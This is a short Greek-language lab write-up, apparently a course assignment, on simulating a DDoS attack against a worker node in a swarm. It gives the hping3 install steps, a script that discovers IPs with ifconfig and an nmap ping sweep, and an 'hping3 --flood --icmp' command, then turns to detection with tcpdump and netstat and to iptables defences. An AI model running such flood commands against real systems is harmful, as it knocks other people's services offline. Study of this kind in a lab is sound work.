2.4 KiB
Προσομοίωση DDos Attack
Για την προσομοίωση της επίθεσης DDos θα χρησιμοποιήσουμε το hping3. Μέσω αυτού του εργαλείου, θα γίνει επίθεση από τον master σε μέλη του σμήνους.
Αρχικά θα κάνουμε εγκατάσταση του hping3 με τις εντολές:
sudo apt update
sudo apt upgrade -y
sudo apt install hping3 -y
Στη συνέχεια, θα χρειαστούμε τις ip του δικτύου μας και του worker στον οποίο θα επιτεθούμε. Θα χρησιμοποιήσουμε αυτοτελείς, αλλά και με τροποποιήσεις, τις εντολές από το αρχείο run.sh. Τις εντολές αυτές και την εντολή της εκτέλεσης της επίθεσης, θα γράψουμε στο script master.sh.
- Η μεταβλητή my_ip περιέχει την ip του master
my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}')
- Για να πάρουμε την ip του όλου του δικτύου, θα εμφωλεύσουμε στη μεταβλητή network το περιεχόμενο της my_ip, αλλά το τελευταίο ψηφίο, τώρα είναι *.
network=$(echo $my_ip | sed 's/.[0-9]$/.*/')
Στη μεταβλητή worker περιέχεται η ip του πρώτου worker, όπως αυτός υπάρχει στο σμήνος. Εάν θέλουμε να επιτεθούμε σε κάποιον άλλο worker, θα βάλουμε το επιθυμητό ψηφίο στην παράμετρο grep worker_ψηφίο.
worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')
Τώρα που έχουμε τις απαραίτητες πληροφορίες, μπορούμε να εκτελέσουμε την επίθεση.
sudo hping3 -p 80 --flood --icmp $worker
β. Χρησιμοποιήστε τα tcpdump, netstat εργαλεία για την εύρεση, ανάλυση και παρουσίαση των συγκεκριμένων επιθέσεων. γ. Δημιουργήστε iptables rules για την αντιμετώπιση των επιθέσεων.